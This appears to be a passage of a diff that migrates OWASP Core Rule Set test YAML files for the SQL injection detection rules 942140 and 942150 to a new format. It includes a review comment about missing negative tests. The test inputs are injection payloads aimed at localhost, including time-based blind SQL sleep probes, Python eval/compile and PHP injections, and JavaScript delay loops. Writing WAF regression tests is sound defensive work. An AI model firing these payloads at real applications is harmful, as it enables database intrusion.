- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
- uri: "/get?sql_table=pg_catalog"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/get?sql_table=pg_catalog"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 2
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "INFORMATION_SCHEMA"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "INFORMATION_SCHEMA"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 3
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "database("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "database("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 4
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "db_name("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "db_name("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 5
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DaTaBasE("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DaTaBasE("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 6
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "InFoRmaTioN_ScHemA"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "InFoRmaTioN_ScHemA"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 7
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DB_NAME("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DB_NAME("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 8
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "tempdb"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "tempdb"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 9
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "msdb"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "msdb"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 10
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "mysql.db"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "mysql.db"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 11
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "MSysAccessObjects"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-12
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "MSysAccessObjects"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 12
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "Northwind"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-13
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "Northwind"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 13
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "northwind"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-14
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "northwind"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 14
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "SCHEMA_NAME"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-15
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "SCHEMA_NAME"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 15
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "DATABASE("
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-16
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "DATABASE("
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 16
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "schema_name"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
- - test_title: 942140-17
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "schema_name"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
+ - test_id: 17
 desc: "SQL Injection Attack: Common DB Names Detected"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "information_schema"
- version: HTTP/1.0
- output:
- log_contains: id "942140"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "information_schema"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942140]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
index c130606..9f33475 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
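Review bot: All 17 stages in this file assert `expect_ids: [942140]` and none asserts `no_expect_ids`, so the migrated file can only catch the rule going silent, not the rule widening to match ordinary text; the sibling files 942130 and 942131 in this diff each carry negative stages. Several probes here are bare words such as `data: "tempdb"`, `data: "Northwind"` and `data: "schema_name"`, which is exactly the kind of input a false-positive check should bracket. One added stage with plain prose in `data:` and `no_expect_ids: [942140]` would pin the intended scope without changing any existing expectation; whether the rule's pattern currently needs that guard is outside this hunk and I have not checked it.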
@@ -2,328 +2,327 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942150.yaml +rule_id: 942150 tests: - - test_title: 942150-1 + - test_id: 1 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1' and sleep(9) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1(select*from(select(sleep(5)))d)" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test')and (select*from(select(sleep(10)))d)--" - version: 
HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=config.ini' and sleep(91) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 7 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=None')and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" 
or sleep(4) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 